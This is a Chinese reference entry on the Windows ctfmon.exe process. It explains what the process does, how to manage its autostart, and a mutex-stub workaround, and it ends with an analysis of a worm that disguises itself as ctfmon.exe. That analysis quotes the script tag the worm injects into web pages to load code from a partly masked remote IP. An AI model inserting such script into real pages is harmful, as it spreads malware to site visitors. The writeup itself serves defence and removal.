ctfmon.exe
进程文件ctfmon 或者 ctfmon.exe
进程名称Alternative User Input Services
进程描述出品者:Microsoft Corp
属于:Microsoft Office Suite
系统进程: 是
后台程序: 是
使用网络: 否
硬件相关: 否
常见错误: 未知N/A
常见错误: 未知N/A
安全等级 (0-5): 0
间谍软件: 否
内存大小:3664k
广告软件: 否
病毒: 否
木马: 否
功能设置Ctfmon.exe 监视活动窗口,并为语音识别、书写识别、键盘、翻译和其他中文可选用户输入方法技术提供文本输入服务支持。
程序ctfmon.exe,系统默认情况下是随电脑开机而自动启动的。如果你设置了ctfmon.exe不随机自动启动,进入系统后你的电脑任务栏中的输入法图标(即语言栏)就不见了。
要设置ctfmon.exe随机自动启动,可以单击“开始”——>“运行”——>输入“msconfig”(引号不要输入),回车——>打开“系统配置使用程序”窗口——>选择“启动”页,找到ctfmon项并在其前面打上钩,按“应用”、“确定”,重启机器即可生效。
如果在“启动”页,找不到ctfmon项,说明注册表中已将该项删除,可以单击“开始”——>“运行”——>输入“regedit”(引号不要输入),回车——>打开“注册表编辑器”,定位到HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun,在窗口的右侧新建名字为ctfmon.exe的字符串值(REG_SZ),并将其值设置为“C:WINDOWSsystem32ctfmon.exe”,然后关闭注册表编辑器,再执行前一步的操作即可。
如果不运行高级文字服务,Ctfmon.exe 几乎不使用系统资源。高级文字服务是 Ctfmon.exe 通过 TIP 控制的输入技术(语音识别、书写识别和输入方法编辑器)。
Ctfmon.exe 是负责控制中文可选用户输入方法技术的文件。它启动语言栏组件(在任务栏中),并一直在后台运行,甚至在退出 Office XP 程序之后也是如此。每次启动 Windows 时,它也会启动,并一直在后台运行,而与 Office XP 程序是否启动无关。不能根据需要加载和卸载中文可选用户输入方法系统。在安装 Office XP 中文可选用户输入方法组件后,Ctfmon.exe 在 Windows 会话期间继续在后台运行。
如何解决关闭 ctfmon.exe后出现输入法切换快捷键乱掉
注意:以下的处理方法不能保证完全不会危害您的计算机。请在采用之前认真考虑。
如果你的win2000系统装了officeXP或以上版本,它会在你和系统里留下一个ctfmon.exe文件,并自动启动运行,他困扰了无数的网友。
首先我们来说一下它对用户界面和操作体验的一些影响。
1. 无论打开什么窗口,总会弹出一个输入法工具体,并且默认是中文输入。
2. 它替换了原来的区域和输入法设置,并以一个文字服务的设置取而代之,而且不能设置默认的输入法。
3. 结束掉原来的输入法工具进程internat.exe,并令他不能在开机时起动。
4. 将自己放在开机时启动的程序列表中,除非修改注册表,否则无法去除。
5. 像病毒一样有重生能力,当你把ctfmon.exe删了以后,他又会随着Office的启动而重新生成。
6. 当你结束了ctfmon.exe后,经常会出现输入法切换快捷键乱掉的情况。
第一步:右击任务栏空白处,点“任务管理器”。
第二步:找到ctfmon.exe,并终止它。
第三步:在系统目录下的system32目录下找到ctfmon.exe,删除掉。
第四步:写一个最简单的api程序(代码见附录),编译后放到ctfmon.exe所在目录,并更名为ctfmon.exe。
第五步:点击“开始”菜单,点击“运行”,输入internat.exe后点击确定。
第六步:重起计算机。
附:
1. 程序代码如下: (注意:以下程序需要用Visual C++编译。)
#include <windows.h>
int APIENTRY WinMain( HINSTANCE, HINSTANCE, LPTSTR, int )
{HANDLE m_hMutex = CreateMutex( NULL, TRUE, "ctfmon.exe" );
if( GetLastError() != ERROR_ALREADY_EXISTS )
while ( 1 ) Sleep( INFINITE );
return 0;}
2. 如果执行后发现word的输入法无法正确使用,解决办法如下:
第一步:打开word
第二步:点击“工具”菜单中的“选项”子菜单。点击“编辑”选项卡。
第三步:清除“输入法控制处于活动状态”的复选。点击“确定”
第四步:点击“工具”菜单中“语言”子菜单中的“设置语言”项。
第五步:在列表中选择“英语 美国”,点击确定。
第六步:关闭Word,重启计算机。
另外的解决方法:开始-运行-输入“regedit”-找到“HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlKeyboard Layouts”-在下面的分支找到美国英语删除就行了
缺少ctfmon进程可能造成的影响
网络上有大量主张中止ctfmon进程的讨论,但是在windows vista,windows 2008, windows 7中,缺少ctfmon进程会引起输入法的不正常行为,常见的情况是用户忽然无法在输入法开启的情况下,以按空格的方式输入可选字的第一个字的情况,刚按下空格时,输入法即被切换为英文。
在这种情况下,仍然可以用数字键来选择要输入的文字。
解决办法是重新运 ctfmon 进程。方法是:
1.点击“开始”菜单,选择“运行”。
2.输入: ctfmon.exe
3.点击“运行”按钮。[3]
病毒行为感染虫下载器45056Win32.Troj.Downloader.c.45056
这是一个蠕虫病毒。(蠕虫病毒比以前少了很多,但对局域网的影响会很大)
该病毒运行后,会指定的网络上下载病毒程序,并且会搜索局域网内机器,以弱口令进行尝试性连接
一旦连接成功,则判断该机器弱口令是否有足够的权限, 有则向该远程机器发送恶意数据,然后利用windows漏洞来下载程序,予以执行.
1.病毒运行后,产生以下病毒文件
%WINDIR% SYSTEM32mipo.bat
%WINDIR% SYSTEM32aimpo.txt
2.添加病毒启动项
启动项名:svchost对应路径:%Documents and Settings%Administrator桌面ctfmon.exe
3.病毒会触发taimpo.bat病毒文件,用来关闭"360安全卫士",使用户的安全性能降低.
4.病毒会检测连接的远程机器,当远程机器的登录木马是弱口令时,则会对该机器进行攻击,最后下载adi.vbs到用户机器上.
5.遍历磁盘,查找*.htm、*.PHP、*.ASP等网页文件,开始感染,插入一段JS代码:
script language=javascript src=http://218.**.**.248/qq.js
这段脚本病毒,可能会被用作下载更多的木马程序,利用蠕虫攻击传播,利用下载器种植木马,是目前黑客偷东西惯用的手法。
解决方案:
怕麻烦直接去下载专杀工具: http://bbs.antidu.cn/forum-35-1.html
1.删除病毒生成的三个文件,可使用清理专家的文件粉碎器完成操作。
%WINDIR% SYSTEM32mipo.bat (%WINDIR%缺省是c:windows目录)
%WINDIR% SYSTEM32aimpo.txt
%Documents and Settings%Administrator桌面ctfmon.exe(伪装成输入法的程序名)
2.使用金山清理专家的修复功能,将病毒添加的注册表启动项删除。
防范措施:
1.最最重要的,是给系统打补丁,登录系统一定要使用口令,就算是电脑只有自己一个人用,也需要安全的登录口令,口令不能太简单,以免被远程攻击工具猜解。(因为只要电脑接入互联网,就能给木马以机会.)
其它方案基本是相通的,不在缀述!
中毒后的解决办法
将杀毒软件升级到最近版本进行查杀,如果查杀完毕后发现输入法无法正常使用的情况,请下载附件中的文件,将其解压后复制到“C:Windowssystem32” 文件夹即可解决。
备注:如果 ctfmon.exe 位于在目录 C:Windows下,那么威胁危险度是 70% 。文件大小是 2,811,732 字节 (占总出现比率 37% ),20,062 字节,50,670 字节,18,353 字节,95,744 字节。应用程序是不可见的。 这是个不知名的文件存放于 Windows 目录。 这个不是 Windows 核心文件。 没有进程的相关资料。 ctfmon.exe 是有能力可以 隐藏自身,监控应用程序。[1][2]